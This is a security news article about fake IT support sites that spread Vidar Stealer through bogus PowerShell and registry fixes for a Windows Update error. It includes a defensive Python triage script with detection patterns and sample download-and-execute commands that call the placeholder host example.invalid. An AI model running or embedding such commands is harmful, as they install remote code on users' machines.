Fake IT Support Sites Spread Malware via Malicious PowerShell Fixes

30 Jun 2024

Fake IT support sites have been on the rise, promoting malicious PowerShell "fixes" for common Windows errors like the 0x80070643 error. These sites are designed to infect devices with information-stealing malware, preying on frustrated Windows users seeking solutions online.

Exploiting User Frustration

According to eSentire’s Threat Response Unit (TRU), threat actors are using compromised YouTube channels to add legitimacy to their fake support sites. These sites offer supposed fixes for the 0x80070643 error, which has plagued Windows users since January because a Windows Update error message is displayed incorrectly.

Microsoft explained that the error message is misleading: what it should report is a lack of free space in the WinRE partition. Expanding that partition manually is too complex for many users, so they look for solutions online. That is where threat actors capitalize on the situation, offering fake fixes that ultimately install malware on the device.

The Mechanics of Deception

The fake IT support sites, such as pchelprwizzards[.]com and pchelprwizardsguide[.]com, guide users to run PowerShell scripts or import Windows Registry files that download malware onto their devices. Once executed, these scripts install information-stealing malware like the Vidar Stealer, compromising sensitive data and leaving users vulnerable to further attacks.
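As an added example (not code from the article, from eSentire, or from Microsoft), the following script shows how a defender can triage such a "fix" before a user runs it: it parses a Windows .reg export and scans PowerShell text for traits that a genuine WinRE fix never needs, namely writes to autorun keys and download-and-execute cradles (remote URLs, hidden windows, execution-policy bypass, encoded commands). The indicator lists, the sample .reg and script text, and the `example.invalid` host are constructed for illustration.

```python
"""Triage a support-site "fix" (a .reg export or a PowerShell snippet)
before a user runs it.  Added example for this article; it is not code
from the article, from eSentire or from Microsoft.  The indicator lists
and the sample inputs at the bottom are constructed for illustration."""
import re

# Keys a registry "fix" for a Windows Update error never needs to touch:
# anything written here runs automatically at logon or process start.
AUTORUN_KEY_PATTERNS = [
    r"\\CurrentVersion\\Run\b",
    r"\\CurrentVersion\\RunOnce\b",
    r"\\Image File Execution Options\\",
    r"\\Winlogon\\",
]

# Traits of a download-and-execute cradle, as (label, regex) pairs.
CRADLE_INDICATORS = [
    ("web download", r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Start-BitsTransfer"),
    ("invoke-expression", r"Invoke-Expression|\biex\b"),
    ("encoded command", r"-EncodedCommand|\s-enc?\s"),
    ("hidden window", r"-w(indowstyle)?\s+hidden"),
    ("execution policy bypass", r"-e(xecution)?p(olicy)?\s+bypass"),
    ("remote url", r"https?://"),
]

REG_KEY_RE = re.compile(r"^\[(-?)(.+)\]\s*$")
REG_VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)\s*=\s*(.*)$')


def parse_reg(text):
    """Return (key, value_name, raw_value) triples from a .reg export.
    Hex continuation lines (trailing backslash) are skipped; the key and
    the value name are what matter for triage."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        m = REG_KEY_RE.match(line)
        if m:
            current = m.group(2)
            continue
        m = REG_VALUE_RE.match(line)
        if m and current is not None:
            name = m.group(1) if m.group(1) is not None else "@"
            entries.append((current, name, m.group(2)))
    return entries


def scan_script(text):
    """Labels of every cradle indicator present in PowerShell text."""
    return [label for label, pat in CRADLE_INDICATORS
            if re.search(pat, text, re.IGNORECASE)]


def triage_reg(text):
    """Findings for a .reg file: autorun keys plus cradle traits in values."""
    findings = []
    for key, name, value in parse_reg(text):
        if any(re.search(p, key, re.IGNORECASE) for p in AUTORUN_KEY_PATTERNS):
            findings.append(f"autorun key: {key}\\{name}")
        findings.extend(f"{label} in value {name}" for label in scan_script(value))
    return findings


def verdict(findings):
    return "suspicious" if findings else "no indicators"


# Constructed samples; example.invalid is a reserved, non-resolving name.
SUSPICIOUS_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"WinREFix"="powershell.exe -w hidden -ep bypass -c \"iwr http://example.invalid/fix.ps1 | iex\""
'''
BENIGN_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"HideFileExt"=dword:00000000
'''
SUSPICIOUS_PS = "iex (New-Object Net.WebClient).DownloadString('http://example.invalid/winre-fix.ps1')"
BENIGN_PS = "Get-Volume | Where-Object DriveLetter -eq 'C' | Select-Object SizeRemaining"

if __name__ == "__main__":
    for label, text in [("suspicious.reg", SUSPICIOUS_REG), ("benign.reg", BENIGN_REG)]:
        f = triage_reg(text)
        print(label, verdict(f), f)
    for label, text in [("suspicious.ps1", SUSPICIOUS_PS), ("benign.ps1", BENIGN_PS)]:
        f = scan_script(text)
        print(label, verdict(f), f)
```

The check is deliberately narrow: a real fix for a WinRE disk-space problem resizes a partition and touches no Run key and no remote host, so any single finding is enough to send the file to an analyst rather than to the user's PowerShell prompt.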

Protecting Yourself

It is essential to be cautious when seeking solutions online for Windows errors. Only download software and fixes from reputable sources to avoid falling victim to malicious actors. Remember, your personal information is valuable, and threat actors are constantly evolving their tactics to steal it. Stay vigilant and prioritize cybersecurity to protect yourself from such attacks.
